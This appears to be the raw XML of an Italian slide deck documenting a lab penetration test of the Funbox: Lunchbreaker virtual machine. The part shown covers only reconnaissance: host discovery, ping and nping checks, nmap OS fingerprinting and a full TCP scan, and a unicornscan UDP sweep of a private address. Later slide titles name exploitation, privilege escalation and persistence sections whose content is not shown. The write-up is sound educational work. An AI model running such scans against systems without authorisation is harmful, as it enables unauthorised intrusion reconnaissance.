            <a:ext cx="9606264" cy="1231487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 primi tre indirizzi IP vengono utilizzati da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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VirtualBox</a:t>
            </a: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per la gestione della virtualizzazione della rete NAT. L’indirizzo IP associato alla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="18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Lunchbreaker</a:t>
            </a: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è il quarto:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10.0.2.4</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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5</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0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88EEAC0-9FE0-C523-5953-5889F61E6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2868" y="1495664"/>
            <a:ext cx="9606264" cy="518874"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>Per scoprire l’indirizzo IP della macchina target, utilizziamo il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/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1BEFA3F-7911-143F-9239-CDCBA339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167" y="2535156"/>
            <a:ext cx="6229666" cy="19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79" y="225156"/>
            <a:ext cx="4150804" cy="1431000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Target Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Raggiungibilità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6</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof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C48BB3-211D-84AC-27A3-7FB3DA15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4368"/>
            <a:ext cx="4170383" cy="165105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8989823-860A-7EAD-D815-97C16C1B5624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140542" y="1376516"/>
            <a:ext cx="415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Usiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> per verificare che la macchina target sia raggiungibile.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86D514-CB36-4951-24EC-7B1D3CBBB071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900654" y="1376515"/>
            <a:ext cx="415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maggiore sicurezza, utilizziamo anche il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>nping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> per testare la connessione TCP su specifiche porte.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71C1924-1E4E-FDDB-420A-71817AF83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654" y="2312568"/>
            <a:ext cx="4901609" cy="317629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38C049E-8338-C025-DAB7-F3240E1BB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54" y="4768058"/>
            <a:ext cx="4895512" cy="157290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83C0F17-EA50-272C-6275-D96DAC2E41C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140542" y="5694631"/>
            <a:ext cx="489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macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> risulta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>raggiungibile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85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3FBA6305-913D-44BD-B3AA-6395AECC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164487"/>
            <a:ext cx="4150804" cy="14310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Target Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200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AF735B0-B62B-4999-B4B5-A783FC1BD4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5495" y="2102698"/>
            <a:ext cx="2861010" cy="365125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it-IT" sz="18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it-IT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-O 10.0.2.4</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1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518C6B7-20BA-4142-996A-BE121D6535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1526" y="5626513"/>
            <a:ext cx="9606264" cy="1231487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Il SO </a:t>
            </a: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associato alla macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i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Lunchbreaker</a:t>
            </a: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è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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it-IT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con version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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e del kernel compresa tra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="18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4.15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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18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5.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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97A4DD-6112-4908-B134-BBE48A0F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80967E29-1480-472A-9FC5-C4768A52587C}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:pPr lvl="0" rtl="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="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237D30-820D-B800-00A0-0BC0D9EEFA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292868" y="1406013"/>
            <a:ext cx="960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/>
              <a:t>Per scoprire il sistema operativo della macchina target, utilizziamo la tecnica di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t> attiva </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>con l’ausilio del tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/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BD07711-C4CF-59B6-CC6E-DE049894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2467823"/>
            <a:ext cx="49377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3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5EA792F7-1D9E-4C7E-A103-E8EDFDC2691E}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:pPr lvl="0" rtl="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Titolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518C3D6C-1104-D8E7-F23F-A51B26C6A9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="-99450"/>
            <a:ext cx="8106771" cy="143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dirty="0" err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target &amp; Port Scanning</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>TCP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C3BEE-347A-6FEE-3A15-20F191701AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209799" y="1331550"/>
            <a:ext cx="810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Verifichiamo quali porte TCP sono attive attraverso il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -T5 -p- 10.0.2.4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> nmap_tcp_scan.xml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7E089A-0EE8-38C2-D59D-E5A34A9A4133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9467345" y="1646182"/>
            <a:ext cx="25465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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: info sui servizi associati alle porte;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T5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: massima velocità di scansione;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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: scansiona tutte le porte;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oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: salva i risultati della scansione in un file xml.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F91CACB-7B89-635D-C4D9-84F2BA5640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4912" y="838327"/>
            <a:ext cx="181824" cy="3205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9377D91-A4B1-F15B-6202-40C95A5E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44" y="3856707"/>
            <a:ext cx="5653912" cy="206210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A84EC3-E328-1087-E8CA-027DEF5ED174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209799" y="3105834"/>
            <a:ext cx="640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 seguito è riportata una tabella con le porte aperte individuate da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con i relativi servizi e versioni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lvl="0" rtl="0"/>
            <a:fld id="{5EA792F7-1D9E-4C7E-A103-E8EDFDC2691E}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:pPr lvl="0" rtl="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Titolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518C3D6C-1104-D8E7-F23F-A51B26C6A9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="-99450"/>
            <a:ext cx="8106771" cy="143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dirty="0" err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target &amp; Port Scanning</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>UDP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C3BEE-347A-6FEE-3A15-20F191701AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209799" y="1331550"/>
            <a:ext cx="810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Verifichiamo quali porte UDP sono attive attraverso il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>unicornscan -mU -Iv 10.0.2.4:1-65535 -r 5000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E7E089A-0EE8-38C2-D59D-E5A34A9A4133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9467345" y="1646182"/>
            <a:ext cx="2546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mU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: modalità di scansione UDP Scanning;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/>
              <a:t>Iv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: abilita la stampa dei risultati;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r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>: rate pacchetti inviati al secondo.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F91CACB-7B89-635D-C4D9-84F2BA5640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4912" y="838327"/>
            <a:ext cx="181824" cy="3205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A84EC3-E328-1087-E8CA-027DEF5ED174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209799" y="3668950"/>
            <a:ext cx="640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ci sono porte UDP aperte.</a:t>
            </a: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93E8BE4-B251-2016-1FEC-879011F3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57" y="4130615"/>
            <a:ext cx="6716654" cy="15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0679"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr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31.tgt.Office_50301183_TF56398539_Win32_OJ112196124" id="{40CAC16E-1372-4095-898E-1E8913780BAB}" vid="{13CB812A-0F0F-40FD-8C4A-D5CF0971791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Schema Forme insolite</Template>
  <TotalTime>615</TotalTime>
  <Words>1316</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>183</Paragraphs>
  <Slides>25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Source Sans Pro</vt:lpstr>
      <vt:lpstr>Source Sans Pro </vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>1_FunkyShapesVTI</vt:lpstr>
      <vt:lpstr>Funbox: Lunchbreaker</vt:lpstr>
      <vt:lpstr>Sommario</vt:lpstr>
      <vt:lpstr>Introduzione</vt:lpstr>
      <vt:lpstr>Introduzione Strumenti utilizzati</vt:lpstr>
      <vt:lpstr>Target Discovery Indirizzo IP</vt:lpstr>
      <vt:lpstr>Target Discovery Raggiungibilità</vt:lpstr>
      <vt:lpstr>Target Discovery OS Fingerprinting</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping Nessus</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping OpenVas</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping Sintesi</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping Vulnerabilità WEB</vt:lpstr>
      <vt:lpstr>Vulnerability Mapping Vulnerabilità WEB</vt:lpstr>
      <vt:lpstr>Target Exploitation </vt:lpstr>
      <vt:lpstr>Target Exploitation </vt:lpstr>
      <vt:lpstr>PostExploitation Privilege Escalation</vt:lpstr>
      <vt:lpstr>PostExploitation Privilege Escalation</vt:lpstr>
      <vt:lpstr>PostExploitation Privilege Escalation</vt:lpstr>
      <vt:lpstr>PostExploitation Privilege Escalation</vt:lpstr>
      <vt:lpstr>PostExploitation Privilege Escalation</vt:lpstr>
      <vt:lpstr>PostExploitation Maintaining Access</vt:lpstr>
      <vt:lpstr>PostExploitation Maintaining Access</vt:lpstr>
      <vt:lpstr>Conclusioni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RAFFAELLA CALÓ</dc:creator>
  <cp:lastModifiedBy>RAFFAELLA CALÓ</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-10T09:49:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-11T06:42:29Z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